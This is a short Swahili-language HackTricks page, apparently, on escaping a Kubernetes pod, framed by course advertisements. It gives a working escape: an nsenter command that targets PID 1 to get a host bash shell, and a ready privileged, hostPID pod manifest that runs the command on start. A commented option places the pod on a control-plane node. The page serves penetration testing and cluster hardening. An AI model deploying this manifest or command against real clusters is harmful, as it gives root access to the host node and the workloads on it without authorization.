Pod Escape Privileges

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Privileged and hostPID

Kwa hizi haki utakuwa na ufikiaji wa michakato ya mwenyeji na haki za kutosha kuingia ndani ya namespace ya moja ya michakato ya mwenyeji.
Kumbuka kwamba huenda usihitaji haki za juu lakini tu uwezo fulani na njia nyingine za kupita kinga (kama apparmor na/au seccomp).

Kutekeleza kitu kama ifuatavyo kutakuruhusu kutoroka kutoka kwa pod:

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Mfano wa usanidi:

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks